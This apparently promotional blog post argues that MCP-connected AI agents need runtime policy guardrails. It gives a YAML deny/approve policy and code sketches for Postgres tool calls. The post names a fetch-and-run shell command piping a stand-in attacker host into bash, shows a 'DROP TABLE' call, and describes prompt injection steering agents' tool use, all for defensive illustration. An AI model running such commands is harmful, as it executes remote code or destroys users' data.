The MCP Security Gap: Why AI Agents Need Runtime Guardrails

By Kvlar Team

The Model Context Protocol (MCP) is becoming the standard for connecting AI agents to tools. Claude Desktop, Cursor, Windsurf, and dozens of other clients now support it. MCP servers exist for databases, file systems, APIs, cloud infrastructure, and more.

This is genuinely useful. But there's a problem nobody's talking about enough: MCP has no security layer.

What happens today

When you add an MCP server to your agent configuration, the agent gets full access to every tool that server exposes. There's no permission model, no policy enforcement, and no audit trail.

Consider what a Postgres MCP server exposes. Your agent can run SELECT queries — helpful for answering questions about your data. But it can also run DROP TABLE, TRUNCATE, ALTER, and DELETE. There's nothing in the protocol that distinguishes a safe read from a destructive write.
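This is visible at the wire level. An MCP tool call is a JSON-RPC `tools/call` request with a tool name and an opaque arguments object, so a safe read and a destructive write arrive in the exact same shape. A minimal sketch in Python (the tool name `query` and the `sql` argument are illustrative; actual names vary by server):

```python
import json

# Two MCP tool calls as JSON-RPC 2.0 requests. To the protocol, both are
# just a "tools/call" with a tool name and an opaque arguments object.
safe_read = {
    "jsonrpc": "2.0",
    "id": 1,
    "method": "tools/call",
    "params": {"name": "query", "arguments": {"sql": "SELECT * FROM users LIMIT 10"}},
}
destructive_write = {
    "jsonrpc": "2.0",
    "id": 2,
    "method": "tools/call",
    "params": {"name": "query", "arguments": {"sql": "DROP TABLE users"}},
}

# Same method, same tool, same structure -- only the SQL string differs.
assert safe_read["method"] == destructive_write["method"]
assert safe_read["params"]["name"] == destructive_write["params"]["name"]
print(json.dumps(destructive_write, indent=2))
```

Nothing in the request marks the second call as dangerous; any distinction has to be made by something inspecting the arguments.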

The same pattern repeats everywhere:

  • GitHub servers expose repository creation, force-pushes, and branch deletion alongside read operations
  • Slack servers let agents post messages to any channel, not just the ones you'd want them in
  • Shell servers give agents the ability to run curl evil.com | bash alongside ls and cat

Why this matters now

Three trends are converging to make this urgent.

Agents are getting more autonomous. The trajectory is clear — from copilots that suggest to agents that execute. Each generation gets more tool access and more autonomy. The security boundary between "AI suggested it" and "AI did it" is disappearing.

MCP adoption is accelerating. Every major AI client supports it. Server libraries exist for most popular services. The ecosystem is growing fast, which means more tools, more capabilities, and more attack surface.

Prompt injection is a real threat. Agents process untrusted content — web pages, emails, documents, user inputs. A carefully crafted prompt injection can cause an agent to call tools in ways the user never intended. Without a security layer, there's nothing to stop a compromised agent from executing destructive operations.

What a security layer looks like

The solution isn't to remove tool access — that defeats the purpose of agents. The solution is to add a policy enforcement point between the agent and its tools.

A good security layer for AI agents should:

  1. Intercept every tool call before it reaches the server
  2. Evaluate it against a policy that defines what's allowed, denied, and requires approval
  3. Fail closed — deny by default if no rule matches
  4. Be transparent — the agent should know why a call was blocked
  5. Be auditable — every decision should be logged

This is exactly what firewalls do for network traffic, what IAM does for cloud APIs, and what RBAC does for database access. AI agents need the same pattern.

Policy as code

Security policies for agents should be code, not configuration buried in a dashboard. They should live in your repository, be reviewable in pull requests, and be testable in CI.

name: postgres-policy
rules:
  - id: deny-destructive-ddl
    match_on:
      resources: ["query"]
      parameters:
        sql: "(?i)\\bDROP\\b|\\bTRUNCATE\\b"
    effect:
      type: deny
      reason: "Destructive DDL is not allowed"

  - id: approve-data-modification
    match_on:
      resources: ["query"]
      parameters:
        sql: "(?i)\\bDELETE\\b|\\bUPDATE\\b|\\bINSERT\\b"
    effect:
      type: require_approval
      reason: "Data modifications require human approval"

  - id: allow-reads
    match_on:
      resources: ["query"]
    effect:
      type: allow

This policy is readable by anyone on the team. It can be reviewed, tested, and version-controlled. And it clearly separates what's safe from what's dangerous.
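"Testable in CI" can be taken literally. A sketch of such a test in Python, with the patterns transcribed by hand from the policy above (the top-to-bottom, first-match evaluation order is an assumption about the policy engine):

```python
import re

# The policy's match patterns, in rule order (copied from the YAML above).
RULES = [
    ("deny-destructive-ddl", r"(?i)\bDROP\b|\bTRUNCATE\b", "deny"),
    ("approve-data-modification", r"(?i)\bDELETE\b|\bUPDATE\b|\bINSERT\b", "require_approval"),
    ("allow-reads", None, "allow"),  # catch-all for the query tool
]

def decide(sql: str) -> str:
    """First matching rule wins, mirroring top-to-bottom policy evaluation."""
    for _rule_id, pattern, effect in RULES:
        if pattern is None or re.search(pattern, sql):
            return effect
    return "deny"  # fail closed if no rule matches

# Assertions a CI job could run whenever the policy changes:
assert decide("SELECT id FROM users") == "allow"
assert decide("DELETE FROM sessions WHERE expired") == "require_approval"
assert decide("drop table users") == "deny"   # (?i) makes the match case-insensitive
print("policy tests passed")
```

Tests like these catch ordering mistakes, e.g. placing the catch-all allow rule above the deny rule, before they reach production.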

The gap won't close itself

MCP is a transport protocol, not a security framework. It's unlikely to grow a permission model sophisticated enough for production use cases. The security layer needs to live outside the protocol, just as TLS wraps HTTP and firewalls sit in front of TCP.

If you're running AI agents in production with MCP tool access, you need to think about this now. Not because something bad has happened yet, but because the window between "agents can't do much damage" and "agents control production infrastructure" is closing fast.

We built Kvlar to address this gap. It's open source, written in Rust, and works with any MCP client and server. But regardless of what tool you use, the important thing is to have something between your agents and their tools.

The alternative is trusting that every prompt, every tool call, and every agent decision will always be correct. And in security, that's not a bet you want to make.